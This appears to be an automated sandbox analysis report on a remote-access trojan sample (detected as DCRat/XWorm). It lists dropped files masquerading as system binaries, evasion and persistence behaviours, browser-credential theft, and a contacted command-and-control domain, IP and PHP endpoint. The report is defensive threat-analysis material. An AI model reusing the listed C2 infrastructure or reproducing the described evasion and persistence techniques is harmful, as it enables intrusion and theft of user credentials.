                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job232
                                    Masquerading                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt341
                                    Virtualization/Sandbox Evasion                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                                    Process Injection                                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523119 Sample: Zn0uX5K1ez.exe Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 100 664930cm.n9shka.top 2->100 104 Multi AV Scanner detection for domain / URL 2->104 106 Suricata IDS alerts for network traffic 2->106 108 Found malware configuration 2->108 110 18 other signatures 2->110 12 Zn0uX5K1ez.exe 4 2->12         started        16 hPeZTHbzcsUskSflSyozwAqUA.exe 2->16         started        18 lsass.exe 2->18         started        20 7 other processes 2->20 signatures3 process4 file5 90 C:\Users\user\AppData\Local\...\svchost.exe, PE32 12->90 dropped 92 C:\Users\user\AppData\Local\...\explorer.exe, PE32+ 12->92 dropped 94 C:\Users\user\AppData\...\Zn0uX5K1ez.exe.log, ASCII 12->94 dropped 138 Drops PE files with benign system names 12->138 22 svchost.exe 3 6 12->22         started        26 explorer.exe 1 12->26         started        140 Antivirus detection for dropped file 16->140 142 Multi AV Scanner detection for dropped file 16->142 144 Machine Learning detection for dropped file 16->144 signatures6 process7 file8 86 C:\blockhostnet\msinto.exe, PE32 22->86 dropped 88 C:\...\dbHnJe8FTGPofdGpjq0jOMhg.vbe, data 22->88 dropped 122 Antivirus detection for dropped file 22->122 124 Multi AV Scanner detection for dropped file 22->124 126 Machine Learning detection for dropped file 22->126 28 wscript.exe 1 22->28         started        128 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 26->128 130 Query firmware table information (likely to detect VMs) 26->130 132 Tries to evade analysis by execution special instruction (VM detection) 26->132 134 3 other signatures 26->134 31 conhost.exe 26->31         started        33 cmd.exe 1 26->33         started        signatures9 process10 signatures11 136 Windows Scripting host queries suspicious COM object (likely to drop second stage) 28->136 35 cmd.exe 1 28->35         started        process12 process13 37 msinto.exe 15 33 35->37         started        41 conhost.exe 35->41         started        file14 78 C:\Windows\debug\explorer.exe, PE32 37->78 dropped 80 C:\Windows\...\hPeZTHbzcsUskSflSyozwAqUA.exe, PE32 37->80 dropped 82 C:\Windows\...\backgroundTaskHost.exe, PE32 37->82 dropped 84 8 other malicious files 37->84 dropped 114 Multi AV Scanner detection for dropped file 37->114 116 Creates an undocumented autostart registry key 37->116 118 Creates multiple autostart registry keys 37->118 120 2 other signatures 37->120 43 cmd.exe 37->43         started        45 csc.exe 4 37->45         started        49 csc.exe 4 37->49         started        signatures15 process16 file17 51 conhost.exe 43->51         started        56 conhost.exe 43->56         started        58 chcp.com 43->58         started        60 w32tm.exe 43->60         started        96 C:\Windows\...\SecurityHealthSystray.exe, PE32 45->96 dropped 146 Infects executable files (exe, dll, sys, html) 45->146 62 conhost.exe 45->62         started        64 cvtres.exe 45->64         started        98 C:\Program Files (x86)\...\msedge.exe, PE32 49->98 dropped 66 conhost.exe 49->66         started        68 cvtres.exe 1 49->68         started        signatures18 process19 dnsIp20 102 664930cm.n9shka.top 37.44.238.250, 49706, 49707, 49708 HARMONYHOSTING-ASFR France 51->102 70 C:\Users\user\Desktop\mFVAeiee.log, PE32 51->70 dropped 72 C:\Users\user\Desktop\kRRssUig.log, PE32 51->72 dropped 74 C:\Users\user\Desktop\iGvrsCDf.log, PE32 51->74 dropped 76 C:\Users\user\Desktop\admBIJoy.log, PE32 51->76 dropped 112 Tries to harvest and steal browser information (history, passwords, etc) 51->112 file21 signatures22

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    Zn0uX5K1ez.exe71%ReversingLabsByteCode-MSIL.Backdoor.XWormRat
                                    Zn0uX5K1ez.exe74%VirustotalBrowse
                                    Zn0uX5K1ez.exe100%AviraVBS/Runner.VPG
                                    Zn0uX5K1ez.exe100%AviraVBS/Runner.VPG
                                    Zn0uX5K1ez.exe100%AviraHEUR/AGEN.1323342
                                    Zn0uX5K1ez.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe100%AviraHEUR/AGEN.1323342
                                    C:\Windows\debug\explorer.exe100%AviraHEUR/AGEN.1323342
                                    C:\Recovery\lsass.exe100%AviraHEUR/AGEN.1323342
                                    C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe100%AviraVBS/Runner.VPG
                                    C:\Users\user\AppData\Local\Temp\svchost.exe100%AviraVBS/Runner.VPG
                                    C:\Users\user\Desktop\SIVCnSke.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\Desktop\crpSXvpM.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\iGvrsCDf.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\Desktop\kRRssUig.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat100%AviraBAT/Delbat.C
                                    C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Temp\explorer.exe100%Joe Sandbox ML
                                    C:\Windows\debug\explorer.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\admBIJoy.log100%Joe Sandbox ML
                                    C:\Recovery\lsass.exe100%Joe Sandbox ML
                                    C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Temp\svchost.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\JfNMDZUx.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\crpSXvpM.log100%Joe Sandbox ML
                                    C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\kRRssUig.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe75%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe56%VirustotalBrowse
                                    C:\Recovery\lsass.exe75%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\lsass.exe56%VirustotalBrowse
                                    C:\Users\user\AppData\Local\Temp\explorer.exe71%ReversingLabsWin64.Trojan.Generic
                                    C:\Users\user\AppData\Local\Temp\explorer.exe65%VirustotalBrowse
                                    C:\Users\user\AppData\Local\Temp\svchost.exe75%ReversingLabsWin32.Trojan.Uztuby
                                    C:\Users\user\AppData\Local\Temp\svchost.exe59%VirustotalBrowse
                                    C:\Users\user\Desktop\AEdPygqV.log29%ReversingLabs
                                    C:\Users\user\Desktop\AEdPygqV.log29%VirustotalBrowse
                                    C:\Users\user\Desktop\JfNMDZUx.log8%ReversingLabs
                                    C:\Users\user\Desktop\JfNMDZUx.log11%VirustotalBrowse
                                    C:\Users\user\Desktop\SIVCnSke.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\SIVCnSke.log41%VirustotalBrowse
                                    C:\Users\user\Desktop\admBIJoy.log8%ReversingLabs
                                    C:\Users\user\Desktop\admBIJoy.log11%VirustotalBrowse
                                    C:\Users\user\Desktop\crpSXvpM.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\crpSXvpM.log69%VirustotalBrowse
                                    C:\Users\user\Desktop\iGvrsCDf.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\iGvrsCDf.log41%VirustotalBrowse
                                    C:\Users\user\Desktop\kRRssUig.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\kRRssUig.log69%VirustotalBrowse
                                    C:\Users\user\Desktop\mFVAeiee.log29%ReversingLabs
                                    C:\Users\user\Desktop\mFVAeiee.log29%VirustotalBrowse
                                    C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe75%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe56%VirustotalBrowse
                                    C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe75%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe56%VirustotalBrowse
                                    C:\Windows\debug\explorer.exe75%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\debug\explorer.exe56%VirustotalBrowse
                                    C:\blockhostnet\msinto.exe75%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\blockhostnet\msinto.exe56%VirustotalBrowse

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    SourceDetectionScannerLabelLink
                                    664930cm.n9shka.top9%VirustotalBrowse

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                                    http://664930cm.n9shka.top9%VirustotalBrowse
                                    http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php9%VirustotalBrowse
                                    http://664930cm.n9shka.top/9%VirustotalBrowse
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    664930cm.n9shka.top
                                    		37.44.238.250
                                    		truetrueunknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.phptrueunknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://ac.ecosia.org/autocomplete?q=conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/chrome_newtabconhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://664930cm.n9shka.topconhost.exe, 00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002707000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002730000.00000004.00000800.00020000.00000000.sdmptrueunknown
                                    https://duckduckgo.com/ac/?q=conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoconhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://664930cm.n9shka.top/conhost.exe, 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmptrueunknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchconhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://664930cm.n9Pconhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.ecosia.org/newtab/conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 